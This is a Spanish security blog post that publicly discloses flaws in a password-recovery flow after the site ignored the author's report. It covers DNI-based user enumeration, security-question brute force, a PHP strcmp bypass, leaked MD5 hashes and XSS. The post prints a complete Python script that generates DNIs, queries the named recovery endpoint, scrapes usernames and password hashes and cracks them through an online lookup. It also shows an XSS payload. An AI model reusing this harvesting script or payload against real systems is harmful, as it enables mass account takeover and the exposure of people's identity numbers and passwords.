---
layout: post
title:  ¿Cúantos fallos de seguridad puede tener la funcionalidad de recuperar contraseña? 
author: rollth
image:
  feature: banners/header.jpg
tags: seguridad contraseñas web
---

Muy buenas a todos,

para hoy tenía pensado hacer un nuevo Post sobre Responsible Disclosure, pero como envié un correo electrónico y me ignoraron de una manera muy fuerte, lo que voy a hacer es explicar como funcionan las vulnerabilidades (sin decir donde se encuentran, quien quiera que lo busque) para ver si a alguien le puede servir para aprender algo nuevo.

<img src="{{ site.url }}/assets/images/whateversec/01_01.png" style="display: block; margin: 0 auto;">

Además del correo electrónico también envie un MD por twitter, donde también me ignoraron, así que voy a publicar toda la información.

<img src="{{ site.url }}/assets/images/whateversec/01_02.png" style="display: block; margin: 0 auto;">

Una vez visto esto ya podemos empezar, lo primero que tengo que decir es que solo mire el proceso de recuperar contraseñas, pero imagino que el resto de la web será del estilo, parece ser un sitio bonito donde jugar.

Vamos a ir paso por paso porque hay mucho que abarcar, así que vamos a comenzar desde el principio, lo primero que podemos ver es una pantalla donde nos pide que introduzcamos el DNI para empezar el flujo de modificar contraseñas.

<img src="{{ site.url }}/assets/images/whateversec/01_03.png" style="display: block; margin: 0 auto;">

En caso de introducir un DNI que exista en la base de datos te lleva al siguiente paso, y en caso de introducir un DNI no existente te mantiene en la misma pantalla. Aquí podemos encontrar el primer error de seguridad (aunque no sea grave). Es posible enumerar a través de los DNIs todos los usuarios registrados en la aplicación dependiendo de la respuesta, yo para esto me hice un script en python que comprobando el tamaño de la respuesta detectaba si el usuario existe o no en la base de datos (más tarde mostraré el script ya que después le añadí nuevas funcionalidades).

<img src="{{ site.url }}/assets/images/whateversec/01_04.png" style="display: block; margin: 0 auto;">

Una vez en este punto podemos ir al siguiente paso introduciendo algún DNI que nos arroje el script de python.

<img src="{{ site.url }}/assets/images/whateversec/01_05.png" style="display: block; margin: 0 auto;">

Podemos ver que la forma de recuperar la contraseña es la típica pregunta de seguridad, esto es algo que no se debería usar en ningún caso por los siguientes motivos:

- Estás indicando a un posible atacante por donde tiene que empezar a buscar para poder evadir esta medida de seguridad.

- Suele ser información poco privada y fácil de conseguir.

- Los usuarios no suelen recordar que pusieron esta información como pregunta de seguridad, por lo que preguntando (a diferencia de una contraseña), no es difícil de que te de esa información.

- En caso de no tener una forma de bloquear los ataques de fuerza bruta es fácil buscar una lista de respuestas posibles a esa pregunta.

En mi caso, como no conozco al usuario en cuestión, vamos a optar por el último punto, así que buscaremos una lista de colores en Google y lanzaremos un ataque de fuerza bruta. De la misma forma que con los colores se puede hacer con nombres de mascota, con el nombre del padre, o con cualquier pregunta que nos encontremos.

<img src="{{ site.url }}/assets/images/whateversec/01_06.png" style="display: block; margin: 0 auto;">

Una vez en este punto ya podríamos modificarle la contraseña al usuario y entrar en su perfil sin ningún problema.

La cuestión de todo esto es que la cosa no acaba aquí, está funcionalidad, además de ser vulnerable a fuerza bruta, se puede byppasear, ¿cómo hacemos esto?

Es bastante simple, en el funcionamiento normal de la aplicación la respuesta a la pregunta se envía por parámetro, y si la respuesta no es correcta te devuelve un mensaje de error, sin embargo, si no se envía este parámetro toma la respuesta como válida y nos deja seguir.

¿Por qué ocurre esto? mi suposición al estar programada en PHP la aplicación web es que tienen el siguiente código.

```
    <?php
    $respuesta = $_POST['respuesta'];
    $respuesta_correcta = "Respuesta correcta";
    if (strcmp($respuesta, $respuesta_correcta) != 1 && strcmp($respuesta, $respuesta_correcta) != -1) {
            // Respuesta correcta
    }
    else{
            // Respuesta incorrecta
    }
    ?>
```

Vamos a ver que está pasando aquí, la función "strcmp" en php, tiene dos respuestas diferentes dependiendo de los datos introducidos:

- En caso de que ambos strings sean iguales el resultado será 0.
- En caso de que los strings no sean iguales el resultado será 1 o -1 dependiendo de cual sea mayor.

Por lo tanto en principio ese código será correcto, ya que está comprobando que los dos Strings sean diferentes, pero ¿qué pas si no envío el parametro?

Bueno, la función haría algo así: **"trcmp(NULL, $respuesta_correcta)"**, en este caso el resultado sería 3 o -3, por lo que el código lo tomará como si la respuesta fuera correcta y veríamos lo siguiente.

<img src="{{ site.url }}/assets/images/whateversec/01_07.png" style="display: block; margin: 0 auto;">

En este punto podríamos cambiarle la contraseña a quien nosotros quisieramos teniendo solo el DNI, además de poder ver los DNIs que están registrados en la aplicación, aunque esto es una pena, porque la cosa no se queda aquí.

Si le echamos un vistazo rápido a la respuesta HTML del servidor tras esta petición vemos, que además de devolver el nombre de usuario, también nos devuelve el hash MD5 que está almacenado en la base de datos.

<img src="{{ site.url }}/assets/images/whateversec/01_08.png" style="display: block; margin: 0 auto;">

Aquí tenemos el nombre de usuario, el hash en MD5 y la longitud de la contraseña, que nos dice que son entre 4 y 8 caracteres, esto hace que sea mucho más sencillo crackearlas, podemos hacer una prueba en [crackstation](https://crackstation.net/).

<img src="{{ site.url }}/assets/images/whateversec/01_09.png" style="display: block; margin: 0 auto;">

Con todo esto preparé un script en python que generaba DNIs de forma aleatoria, comprobaba que existieran y en caso de que existieran parseaba el usuario y el hash, crackeaba este hash a través de una base de datos online e imprimía toda esta información.

<img src="{{ site.url }}/assets/images/whateversec/01_10.png" style="display: block; margin: 0 auto;">

El script que preparé (se que es muy chustero) es este.

```
    #!/usr/bin/python
    # -*- coding: UTF-8 -*-
    import json
    from random import randint
    import requests
    import urllib3
    from html.parser import HTMLParser
    from bs4 import BeautifulSoup as BSoup
    import sys
    urllib3.disable_warnings()
    # Crackea un hash
    def decrypt(hash):
            content = requests.get('https://md5.gromweb.com/?md5=' + hash)
            soup = BSoup(content.text, "html.parser")
            hashresult = soup.find('em', attrs={'class': 'long-content string'})
            if hashresult:
                    return hashresult.text
    # Parsea la respuesta y obtiene Hash
    class MyHTMLParser(HTMLParser):
            def handle_starttag(self, tag, attrs):
                    for attr in attrs:
                            if attr[0] == "value":
                                    if len(attr[1]) == 32:
                                            hash1 = attr[1]
                                            if decrypt(hash1):
                                                    print "Password: " + decrypt(hash1)
                                                    f.write(" - Password: " + decrypt(hash1))
                                            else:
                                                    print "Hash: " + attr[1]
                                                    f.write(" - Hash: " + attr[1])
                                    if len(attr[1]) != 32:
                                            print "Usuario: " + attr[1]
                                            f.write(" - Usuario: " + attr[1] + "\n")
    URL = "https://ws035.dominio.es"
    path = "/bolsa/http/olvidoclave3.php"
    header = {"Content-Type": "application/x-www-form-urlencoded"}
    usuarios = 0
    prueba = 1
    f = open("DNIs.txt", "a")
    # Pregunta cuantos usuarios se desean obtener
    numUsuarios = raw_input("¿Cuantos usuarios quieres sacar? ")
    if int(numUsuarios) == 1:
            numeroDNI = raw_input("Introducir numero de DNI ")
    while usuarios < int(numUsuarios):
            # Genera un DNI aleatorio
            numero = randint(10000000, 99999999)
            if int(numUsuarios) == 1:
                    numero = int(numeroDNI)
            intnumero = int(numero)
            letra1 = "TRWAGMYFPDXBNJZSQVHLCKET"
            resto = intnumero%23
            letra = letra1[resto]
            # Prepara la informacion que se enviara por el metodo POST
            data = "documento=" + str(intnumero) + "&tipo_documento=+&letra=" + letra + "&test=test"
            # Realiza la peticion
            try:
                    resp = requests.post(URL+path, data=data, verify=False, timeout=3, headers=header)
                    tamano = int(resp.headers["Content-Length"])
            except requests.exceptions.ReadTimeout:
                    tamano = 7000
            # Comprueba si existe o no el usuario
            if tamano < 6000 and tamano > 5000:
                    print "DNI encontrado: " + str(numero) + letra
                    f.write("DNI encontrado: " + str(numero) + letra)
                    parser = MyHTMLParser()
                    parser.feed(resp.content)
                    usuarios = usuarios + 1
            else:
                    print "Intento numero: " + str(prueba) + " - Usuarios encontrados: " + str(usuarios)
                    prueba = prueba + 1
    f.close()
```

Por último, y ya de verdad prometo que acabo, todos los parámetros eran vulnerables a XSS, el payload que usé fue este:

```
"><script>alert(document.domain)</script>
```

<img src="{{ site.url }}/assets/images/whateversec/01_11.png" style="display: block; margin: 0 auto;">  

Ya hemos acabado por hoy, espero que os haya resultado interesante el post.

Saluti.

Ia e perdio la cuenta de cuantas vulneravilidades tenia

<hr>

A raiz de este post se pusieron en contacto conmigo para arreglar las vulnerabilidades y disculparse por no responder en el primer reporte.

Actualmente la página se encuentra en reparación y no se puede acceder. Alegra que se hagan las cosas bien.

<img src="{{ site.url }}/assets/images/whateversec/01_12.png" style="display: block; margin: 0 auto;">

*Originalmente escrito en: [https://www.whateversec.com/2019/01/cuantos-fallos-de-seguridad-puede-tener.html](https://www.whateversec.com/2019/01/cuantos-fallos-de-seguridad-puede-tener.html)*
